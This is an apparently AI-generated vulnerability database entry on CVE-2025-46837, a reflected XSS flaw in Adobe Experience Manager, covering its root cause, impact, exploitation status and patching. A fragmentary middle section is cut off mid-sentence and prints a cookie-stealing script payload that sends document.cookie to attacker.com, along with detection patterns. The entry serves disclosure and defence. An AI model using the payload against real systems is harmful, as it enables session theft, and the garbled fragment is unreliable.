
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-46837 is a reflected Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields, which are then executed in a victim's browser. It affects AEM versions 6.5.22 and earlier (on-premises) and AEM Cloud Service versions prior to 2025.5.0. The vulnerability was published on June 10, 2025, with a patch made available the same day. It carries a CVSS v3.1 base score of 8.7 (High) (Adobe Advisory).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79: Cross-site Scripting) combined with improper input validation (CWE-20). As a reflected XSS vulnerability, an attacker crafts a malicious URL or form submission containing a JavaScript payload targeting vulnerable form fields in AEM; when a victim visits the crafted link, the server reflects the unsanitized input back in the HTTP response, causing the browser to execute the injected script. Exploitation requires the attacker to have low-level privileges and to socially engineer a victim into clicking a malicious link (user interaction required), with the scope of impact extending beyond the vulnerable component (changed scope) (Adobe Advisory).
Successful exploitation can lead to session takeover, enabling an attacker to impersonate the victim and perform unauthorized actions within AEM. Both confidentiality and integrity are rated as high impact — an attacker could exfiltrate session tokens, credentials, or sensitive content, and manipulate data or configurations within the CMS. Availability is not directly impacted, but a compromised privileged session could be leveraged for further lateral movement within the AEM environment (Adobe Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.041%, indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Adobe Advisory).
/libs/granite/core/content/login.html).<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) targeting the vulnerable parameter.%3Cscript%3E, javascript:, onerror=).Adobe has released patches addressing this vulnerability: upgrade AEM on-premises to version 6.5.23.0 or later, and AEM Cloud Service to version 2025.5.0 or later. No official configuration-based workaround has been published; upgrading is the recommended remediation. As supplementary hardening, organizations should implement strict Content Security Policy (CSP) headers, enforce input validation and output encoding on all form fields, and monitor AEM access logs for anomalous input patterns (Adobe Advisory).
The vulnerability was noted in a CIS advisory covering multiple Adobe product vulnerabilities released in June 2025, categorized under advisories that could allow for arbitrary code execution across Adobe products (CIS Advisory). Coverage was also aggregated by vulnerability tracking services including Tenable and CVEFeed. No significant independent researcher commentary or social media discussion specific to this CVE has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."